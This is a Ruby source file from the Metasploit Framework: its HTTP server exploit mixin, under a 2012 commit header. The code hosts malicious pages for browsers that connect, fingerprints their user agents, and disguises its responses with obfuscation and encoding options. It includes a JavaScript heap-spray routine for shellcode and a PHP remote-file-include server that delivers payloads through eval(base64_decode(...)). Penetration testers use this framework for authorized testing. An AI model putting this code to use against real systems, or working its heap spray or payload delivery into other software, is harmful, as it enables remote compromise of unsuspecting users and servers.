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James Lee a86bdf883e Add defaults to the print_* method arguments
Fixes breakage with modules that use print_line() or similar.

This commit also includes some RDoc additions and markup fixes
2012-04-11 00:14:03 -06:00

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require 'rex/service_manager'
require 'rex/exploitation/obfuscatejs'
require 'rex/exploitation/encryptjs'
require 'rex/exploitation/heaplib'
module Msf
###
#
# This module provides methods for exploiting an HTTP client by acting
# as an HTTP server.
#
###
module Exploit::Remote::HttpServer
include Msf::Exploit::Remote::TcpServer
include Msf::Auxiliary::Report
def initialize(info = {})
super
register_options(
[
OptString.new('URIPATH', [ false, "The URI to use for this exploit (default is random)"]),
], Exploit::Remote::HttpServer
)
register_evasion_options(
[
OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', 'false']),
OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', 'false']),
OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', 'false']),
OptEnum.new('HTTP::compression', [false, 'Enable compression of HTTP responses via content encoding', 'none', ['none','gzip','deflate']]),
OptString.new('HTTP::server_name', [true, 'Configures the Server header of all outgoing replies', 'Apache'])
], Exploit::Remote::HttpServer
)
@service_path = nil
end
#
# By default, all HTTP servers are not subject to automatic exploitation
#
def autofilter
false
end
#
# Thread-local client accessor
#
def cli
Thread.current[:cli]
end
#
# Thread-local client accessor
#
def cli=(cli)
Thread.current[:cli] = cli
end
# :category: print_* overrides
# Prepends client and module name if inside a thread with a #cli
def print_line(msg='')
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
end
# :category: print_* overrides
# Prepends client and module name if inside a thread with a #cli
def print_status(msg='')
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
end
# :category: print_* overrides
# Prepends client and module name if inside a thread with a #cli
def print_error(msg='')
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
end
# :category: print_* overrides
# Prepends client and module name if inside a thread with a #cli
def print_debug(msg='')
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
end
# :category: print_* overrides
# Prepends client and module name if inside a thread with a #cli
def vprint_line(msg='')
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
end
# :category: print_* overrides
# Prepends client and module name if inside a thread with a #cli
def vprint_status(msg='')
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
end
# :category: print_* overrides
# Prepends client and module name if inside a thread with a #cli
def vprint_error(msg='')
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
end
# :category: print_* overrides
# Prepends client and module name if inside a thread with a #cli
def vprint_debug(msg='')
(cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
end
#
# Ensures that gzip can be used. If not, an exception is generated. The
# exception is only raised if the DisableGzip advanced option has not been
# set.
#
def use_zlib
if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true)
raise RuntimeError, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!"
end
end
#
# This method gives a derived class the opportunity to ensure that all
# dependencies are present before initializing the service.
#
# By default, all HTTP server mixins will try to use zlib.
#
def check_dependencies
use_zlib
end
##
# :category: Exploit::Remote::TcpServer overrides
#
# This mixin starts the HTTP server listener. This routine takes a few
# different hash parameters:
#
# ServerHost => Override the server host to listen on (default to SRVHOST).
# ServerPort => Override the server port to listen on (default to SRVPORT).
# Uri => The URI to handle and the associated procedure to call.
#
def start_service(opts = {})
check_dependencies
comm = datastore['ListenerComm']
if (comm.to_s == "local")
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
# Default the server host and port to what is required by the mixin.
opts = {
'ServerHost' => datastore['SRVHOST'],
'ServerPort' => datastore['SRVPORT'],
'Comm' => comm
}.update(opts)
# Start a new HTTP server service.
self.service = Rex::ServiceManager.start(
Rex::Proto::Http::Server,
opts['ServerPort'].to_i,
opts['ServerHost'],
datastore['SSL'],
{
'Msf' => framework,
'MsfExploit' => self,
},
opts['Comm'],
datastore['SSLCert']
)
self.service.server_name = datastore['HTTP::server_name']
# Default the procedure of the URI to on_request_uri if one isn't
# provided.
uopts = {
'Proc' => Proc.new { |cli, req|
self.cli = cli
framework.events.on_httpserver_request(self, cli, req)
on_request_uri(cli, req)
},
'Path' => resource_uri
}.update(opts['Uri'] || {})
proto = (datastore["SSL"] ? "https" : "http")
print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
if (opts['ServerHost'] == '0.0.0.0')
print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
end
add_resource(uopts)
end
#
# Return a Hash containing a best guess at the actual browser and operating
# system versions, based on the User-Agent header.
#
# Keys in the returned hash are similar to those expected of
# Report#report_client, and Report#report_host namely:
# +:ua_name+:: a brief identifier for the client, e.g. "Firefox"
# +:ua_ver+:: the version number of the client, e.g. "3.0.11"
# +:os_name+:: one of the Msf::OperatingSystems constants
# +:os_flavor+:: something like "XP" or "Gentoo"
# +:os_lang+:: something like "English", "French", or "en-US"
# +:arch+:: one of the ARCH_* constants
#
# Unknown values may be nil.
#
def fingerprint_user_agent(ua_str)
fp = { :ua_string => ua_str }
# always check for IE last because everybody tries to
# look like IE
case (ua_str.downcase)
# Chrome tries to look like Safari, so check it first
when /chrome\/(\d+(:?\.\d+)*)/
# Matches, e.g.:
# Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
fp[:ua_name] = HttpClients::CHROME
fp[:ua_ver] = $1
when /version\/(\d+(:?\.\d+)*)\s*safari/
fp[:ua_name] = HttpClients::SAFARI
fp[:ua_ver] = $1
when /firefox\/((:?[0-9]+\.)+[0-9]+)/
fp[:ua_name] = HttpClients::FF
fp[:ua_ver] = $1
when /opera\/(\d+(:?\.\d+)*)/
fp[:ua_name] = HttpClients::OPERA
fp[:ua_ver] = $1
when /mozilla\/[0-9]\.[0-9] \(compatible; msie ([0-9]\.[0-9]+)/
fp[:ua_name] = HttpClients::IE
fp[:ua_ver] = $1
else
fp[:ua_name] = HttpClients::UNKNOWN
end
case (ua_str.downcase)
when /(en-us|en-gb)/
fp[:os_lang] = $1
end
case (ua_str.downcase)
when /windows/
fp[:os_name] = OperatingSystems::WINDOWS
fp[:arch] = ARCH_X86
when /linux/
fp[:os_name] = OperatingSystems::LINUX
when /iphone/
fp[:os_name] = OperatingSystems::MAC_OSX
fp[:arch] = 'armle'
when /mac os x/
fp[:os_name] = OperatingSystems::MAC_OSX
else
fp[:os_name] = OperatingSystems::UNKNOWN
end
case (ua_str.downcase)
when /windows 95/
fp[:os_flavor] = '95'
when /windows 98/
fp[:os_flavor] = '98'
when /windows nt 4/
fp[:os_flavor] = 'NT'
when /windows nt 5.0/
fp[:os_flavor] = '2000'
when /windows nt 5.1/
fp[:os_flavor] = 'XP'
when /windows nt 5.2/
fp[:os_flavor] = '2003'
when /windows nt 6.0/
fp[:os_flavor] = 'Vista'
when /windows nt 6.1/
fp[:os_flavor] = '7'
when /gentoo/
fp[:os_flavor] = 'Gentoo'
when /debian/
fp[:os_flavor] = 'Debian'
when /ubuntu/
fp[:os_flavor] = 'Ubuntu'
when /fedora/
fp[:os_flavor] = 'Fedora'
when /red hat|rhel/
fp[:os_flavor] = 'RHEL'
when /android/
fp[:os_flavor] = 'Android'
else
fp[:os_flavor] = ''
end
case (ua_str.downcase)
when /ppc/
fp[:arch] = ARCH_PPC
when /x64|x86_64/
fp[:arch] = ARCH_X86_64
when /i.86|wow64/
# WOW64 means "Windows on Windows64" and is present
# in the useragent of 32-bit IE running on 64-bit
# Windows
fp[:arch] = ARCH_X86
when /android|iphone|ipod|ipad/
fp[:arch] = ARCH_ARMLE
else
fp[:arch] = ARCH_X86
end
fp
end
#
# Store the results of server-side User-Agent fingerprinting in the DB.
#
# Returns a Hash containing host and client information.
#
def report_user_agent(address, request, client_opts={})
fp = fingerprint_user_agent(request["User-Agent"])
host = {
:address => address,
:host => address,
}
host[:os_name] = fp[:os_name] if fp[:os_name]
host[:os_flavor] = fp[:os_flavor] if fp[:os_flavor]
host[:arch] = fp[:arch] if fp[:arch]
host[:os_lang] = fp[:os_lang] if fp[:os_lang]
report_host(host)
client = {
:host => address,
:ua_string => request['User-Agent'],
}
client[:ua_name] = fp[:ua_name] if fp[:ua_name]
client[:ua_ver] = fp[:ua_ver] if fp[:ua_ver]
client.merge!(client_opts) if client_opts
report_client(client)
report_note(
:host => address,
:type => 'http.request',
:data => "#{address}: #{request.method} #{request.resource} #{client[:os_name]} #{client[:ua_name]} #{client[:ua_ver]}",
:update => :unique_data
)
return host.merge(client)
end
#
# Adds a URI resource using the supplied hash parameters.
#
# Path => The path to associate the procedure with.
# Proc => The procedure to call when the URI is requested.
# LongCall => Indicates that the request is a long call.
#
# NOTE: Calling #add_resource will change the results of subsequent calls
# to #get_resource!
#
def add_resource(opts)
@service_path = opts['Path']
service.add_resource(opts['Path'], opts)
end
#
# Returns the last-used resource path
#
def get_resource
# We don't want modules modifying their service_path inadvertantly, so
# give them a dup. Can be nil during module setup.
@service_path ? @service_path.dup : nil
end
#
# Return a full url of the form http://1.1.1.1:8080/resource/
#
# The address portion should be something a client would be able to route,
# but see +srvhost_addr+ for caveats.
#
def get_uri(cli=nil)
ssl = !!(datastore["SSL"])
proto = (ssl ? "https://" : "http://")
if (cli and cli.peerhost)
host = Rex::Socket.source_address(cli.peerhost)
else
host = srvhost_addr
end
if Rex::Socket.is_ipv6?(host)
host = "[#{host}]"
end
if (ssl and datastore["SRVPORT"] == 443)
port = ''
elsif (!ssl and datastore["SRVPORT"] == 80)
port = ''
else
port = ":" + datastore["SRVPORT"].to_s
end
uri = proto + host + port + get_resource
uri
end
#
# Return an address to which the client can route.
#
# If available, return LHOST which should be the right thing since it
# already has to be an address the client can route to for the payload to
# work. However, LHOST will only be available if we're using a reverse_*
# payload, so if we don't have it, try to use the client's peerhost
# address. Failing that, fall back to the addr with the default gateway.
# All of this will be for naught in the case of a user behind NAT using a
# bind payload but there's nothing we can do about it.
#
# NOTE: The address will be *incorrect* in the following two situations:
# 1) LHOST is pointed at a multi/handler on some other box.
# 2) SRVHOST has a value of '0.0.0.0', the user is behind NAT, and we're
# using a bind payload. In that case, we don't have an LHOST and
# the source address will be internal.
#
# This can potentially be dealt with in a module by using the Host header
# from a request if such a header exists.
#
def srvhost_addr
if (datastore['LHOST'])
host = datastore["LHOST"]
else
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
if (sock and sock.peerhost)
host = Rex::Socket.source_address(sock.peerhost)
else
host = Rex::Socket.source_address
end
else
host = datastore['SRVHOST']
end
end
end
#
# Removes a URI resource.
#
def remove_resource(name)
service.remove_resource(name)
end
#
# Closes a client connection.
#
def close_client(cli)
service.close_client(cli)
end
#
# Creates an HTTP response packet.
#
def create_response(code = 200, message = "OK", proto = Rex::Proto::Http::DefaultProtocol)
res = Rex::Proto::Http::Response.new(code, message, proto);
res['Content-Type'] = 'text/html'
res
end
#
# Transmits a response to the supplied client, default content-type is text/html
#
# Payload evasions are implemented here!
#
def send_response(cli, body, headers = {})
response = create_response
response['Content-Type'] = 'text/html'
response.body = body.to_s.unpack("C*").pack("C*")
if (datastore['HTTP::compression'])
self.use_zlib # make sure...
response.compress = datastore['HTTP::compression']
end
if (datastore['HTTP::chunked'] == true)
response.auto_cl = false
response.transfer_chunked = true
end
if (datastore['HTTP::header_folding'] == true)
response.headers.fold = 1
end
if (datastore['HTTP::junk_headers'] == true)
response.headers.junk_headers = 1
end
headers.each_pair { |k,v| response[k] = v }
cli.send_response(response)
end
#
# Sends a 302 redirect to the client
#
def send_redirect(cli, location='/', body='')
response = create_response(302, 'Moved')
response['Content-Type'] = 'text/html'
response['Location'] = location
response.body = body.to_s.unpack("C*").pack("C*")
cli.send_response(response)
end
#
# Sends a 302 redirect relative to our base path
#
def send_local_redirect(cli, location)
send_redirect(cli, get_resource + location)
end
#
# Sends a 404
#
def send_not_found(cli)
resp_404 = create_response(404, 'Not Found')
resp_404.body = %Q{\
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.2.9 (Unix) Server at #{datastore['LHOST']} Port #{datastore['SRVPORT']}</address>
</body></html>
}
cli.send_response(resp_404)
end
#
# Returns the configured (or random, if not configured) URI path
#
def resource_uri
path = datastore['URIPATH'] || random_uri
path = '/' + path if path !~ /^\//
return path
end
#
# Generates a random URI for use with making finger printing more
# challenging.
#
def random_uri
"/" + Rex::Text.rand_text_alphanumeric(rand(10) + 6)
end
#
# Re-generates the payload, substituting the current RHOST and RPORT with
# the supplied client host and port.
#
def regenerate_payload(cli, arch = nil, platform = nil, target = nil)
pcode = nil
# If the payload fails to generate for some reason, send a 403.
if ((pcode = super(cli, arch, platform, target)) == nil)
print_error("Failed to generate payload, sending 403.")
cli.send_response(
create_response(403, 'Forbidden'))
return nil
end
pcode
end
##
#
# Override methods
#
##
#
# Called when a request is made to a single URI registered during the
# start_service. Subsequent registrations will not result in a call to
# on_request_uri.
#
def on_request_uri(cli, request)
end
end
###
#
# This module provides methods for exploiting an HTTP client by acting
# as an HTTP server.
#
###
module Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::HttpServer
protected
def initialize(info = {})
super
register_evasion_options(
[
# utf-8, utf-7 and utf-7-all are currently not supported by
# most browsers. as such, they are not added by default. The
# mixin supports encoding using them, however they are not
# listed in the Option.
OptEnum.new('HTML::unicode', [false, 'Enable HTTP obfuscation via unicode', 'none', ['none', 'utf-16le', 'utf-16be', 'utf-16be-marker', 'utf-32le', 'utf-32be']]),
OptEnum.new('HTML::base64', [false, 'Enable HTML obfuscation via an embeded base64 html object (IE not supported)', 'none', ['none', 'plain', 'single_pad', 'double_pad', 'random_space_injection']]),
OptInt.new('HTML::javascript::escape', [false, 'Enable HTML obfuscation via HTML escaping (number of iterations)', 0]),
], Exploit::Remote::HttpServer::HTML)
end
#
# Obfuscates symbols found within a javascript string.
#
# Returns an ObfuscateJS object
#
def obfuscate_js(javascript, opts)
js = Rex::Exploitation::ObfuscateJS.new(javascript, opts)
js.obfuscate
return js
end
#
# Encrypts a given javascript string using the provided key.
#
# Returns a string containing the encrypted string and a loader
#
def encrypt_js(javascript, key)
js_encoded = Rex::Exploitation::EncryptJS.encrypt(javascript, key)
end
#
# Returns the heaplib javascript, including any custom javascript supplied
# by the caller.
#
def heaplib(custom_js = '', opts = {})
Rex::Exploitation::HeapLib.new(custom_js, opts).to_s
end
def js_base64
js = <<-ENDJS
// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
// variable names changed to make obfuscation easier
var Base64 = {
// private property
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
// private method
_utf8_encode : function ( input ){
input = input.replace(/\\r\\n/g,"\\n");
var utftext = "";
var input_idx;
for (input_idx = 0; input_idx < input.length; input_idx++) {
var chr = input.charCodeAt(input_idx);
if (chr < 128) {
utftext += String.fromCharCode(chr);
}
else if((chr > 127) && (chr < 2048)) {
utftext += String.fromCharCode((chr >> 6) | 192);
utftext += String.fromCharCode((chr & 63) | 128);
} else {
utftext += String.fromCharCode((chr >> 12) | 224);
utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
utftext += String.fromCharCode((chr & 63) | 128);
}
}
return utftext;
},
// public method for encoding
encode : function( input ) {
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var input_idx = 0;
input = Base64._utf8_encode(input);
while (input_idx < input.length) {
chr1 = input.charCodeAt( input_idx++ );
chr2 = input.charCodeAt( input_idx++ );
chr3 = input.charCodeAt( input_idx++ );
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
}
return output;
},
// public method for decoding
decode : function (input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\\+\\/\\=]/g, "");
while (i < input.length) {
enc1 = this._keyStr.indexOf(input.charAt(i++));
enc2 = this._keyStr.indexOf(input.charAt(i++));
enc3 = this._keyStr.indexOf(input.charAt(i++));
enc4 = this._keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
}
output = Base64._utf8_decode(output);
return output;
},
_utf8_decode : function (utftext) {
var string = "";
var input_idx = 0;
var chr1 = 0;
var chr2 = 0;
var chr3 = 0;
while ( input_idx < utftext.length ) {
chr1 = utftext.charCodeAt(input_idx);
if (chr1 < 128) {
string += String.fromCharCode(chr1);
input_idx++;
}
else if((chr1 > 191) && (chr1 < 224)) {
chr2 = utftext.charCodeAt(input_idx+1);
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
input_idx += 2;
} else {
chr2 = utftext.charCodeAt(input_idx+1);
chr3 = utftext.charCodeAt(input_idx+2);
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
input_idx += 3;
}
}
return string;
}
};
ENDJS
opts = {
'Symbols' => {
'Variables' => %w{ Base64 encoding result _keyStr encoded_data utftext input_idx
input output chr chr1 chr2 chr3 enc1 enc2 enc3 enc4 },
'Methods' => %w{ _utf8_encode _utf8_decode encode decode }
}
}
js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
return js
end
def js_heap_spray
js = %Q|var memory = new Array();
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
var index;
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
for (index = 0; index < heapBlockCnt; index++) {
memory[index] = retSlide + shellcode;
}
}
|
opts = {
'Symbols' => {
'Variables' => %w{ shellcode retSlide payLoadSize memory index
heapSprayAddr_lo heapSprayAddr_hi heapSprayAddr heapBlockSize
heapBlockCnt },
'Methods' => %w{ sprayHeap }
}
}
js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
return js
end
def js_os_detect
return ::Rex::Exploitation::JavascriptOSDetect.new
end
# Transmits a html response to the supplied client
#
# HTML evasions are implemented here.
def send_response_html(cli, body, headers = {})
body = body.to_s.unpack("C*").pack("C*")
if datastore['HTML::base64'] != 'none'
case datastore['HTML::base64']
when 'plain'
body = Rex::Text.encode_base64(body)
when 'single_pad'
body = Rex::Text.encode_base64(' ' + body)
when 'double_pad'
body = Rex::Text.encode_base64(' ' + body)
when 'random_space_injection'
body = Rex::Text.encode_base64(body)
new = ''
while (body.size > 0)
new << body.slice!(0, rand(3) + 1) + Rex::Text.rand_text(rand(5) + 1, '', " \n")
end
body = new
end
body = '<HTML><BODY><OBJECT ID="' + Rex::Text.rand_text_alpha(rand(10)+5) + '" ' +
'HEIGHT="100%" WIDTH="100%" TYPE="text/html" DATA="data:text/html;base64,' +
body + '">Could not render object</OBJECT></BODY></HTML>'
end
if datastore['HTML::javascript::escape'] > 0
datastore['HTML::javascript::escape'].times {
body = '<script>document.write(unescape("' + Rex::Text.to_hex(body, '%') + '"))</script>'
}
end
if ['utf-16le','utf-16be','utf32-le','utf32-be','utf-7','utf-8'].include?(datastore['HTML::unicode'])
headers['Content-Type'] = 'text/html; charset= ' + datastore['HTML::unicode']
body = Rex::Text.to_unicode(body, datastore['HTML::unicode'])
else
# special cases
case datastore['HTML::unicode']
when 'utf-16be-marker'
headers['Content-Type'] = 'text/html'
body = "\xFE\xFF" + Rex::Text.to_unicode(body, 'utf-16be')
when 'utf-7-all'
headers['Content-Type'] = 'text/html; charset=utf-7'
body = Rex::Text.to_unicode(body, 'utf-7', 'all')
when 'none'
# do nothing
else
raise RuntimeError, 'Invalid unicode. how did you get here?'
end
end
send_response(cli, body, headers)
end
end
###
#
# This module provides methods for exploiting PHP scripts by acting as an HTTP
# server hosting the payload for Remote File Include vulnerabilities.
#
###
module Exploit::Remote::HttpServer::PHPInclude
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
# Override TCPServer's stance of passive
super(update_info(info, 'Stance' => Msf::Exploit::Stance::Aggressive))
register_evasion_options(
[
OptEnum.new('PHP::Encode', [false, 'Enable PHP code obfuscation', 'none', ['none', 'base64']]),
], Exploit::Remote::HttpServer::PHPInclude
)
end
# Since these types of vulns are Stance::Aggressive, override HttpServer's
# normal non-automatic behaviour and allow things to run us automatically
def autofilter
true
end
##
# :category: Exploit::Remote::TcpServer overrides
#
# Override exploit() to handle service start/stop
#
# Disables SSL for the service since we always want to serve our evil PHP
# files from a non-ssl server. There are two reasons for this:
# 1. https is only supported on PHP versions after 4.3.0 and only if
# the OpenSSL extension is compiled in, a non-default configuration on
# most systems
# 2. somewhat less importantly, the SSL option would conflict with the
# option for our client connecting to the vulnerable server
#
def exploit
old_ssl = datastore["SSL"]
datastore["SSL"] = false
start_service
datastore["SSL"] = old_ssl
#if (datastore["SRVHOST"] == "0.0.0.0" and Rex::Socket.is_internal?(srvhost_addr))
# print_error("Warning: the URL used for the include might be wrong!")
# print_error("If the target system can route to #{srvhost_addr} it")
# print_error("is safe to ignore this warning. If not, try using a")
# print_error("reverse payload instead of bind.")
#end
begin
print_status("PHP include server started.");
php_exploit
::IO.select(nil, nil, nil, 5)
rescue ::Interrupt
raise $!
ensure
stop_service
end
end
#
# Transmits a PHP payload to the web application
#
def send_php_payload(cli, body, headers = {})
case datastore['PHP::Encode']
when 'base64'
body = "<?php eval(base64_decode('#{Rex::Text.encode_base64(body)}'));?>"
when 'none'
body = "<?php #{body} ?>"
end
send_response(cli, body, headers)
end
##
# :category: Event Handlers
#
# Handle an incoming PHP code request
#
def on_request_uri(cli, request, headers={})
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Send it to the application
send_php_payload(cli, p.encoded, headers)
end
#
# Return the PHP include URL (pre-encoded)
#
# Does not take SSL into account. For the reasoning behind this, see +exploit+.
#
def php_include_url(sock=nil)
host = srvhost_addr
if Rex::Socket.is_ipv6?(host)
host = "[#{host}]"
end
"http://#{host}:#{datastore['SRVPORT']}#{get_resource()}?"
end
end
end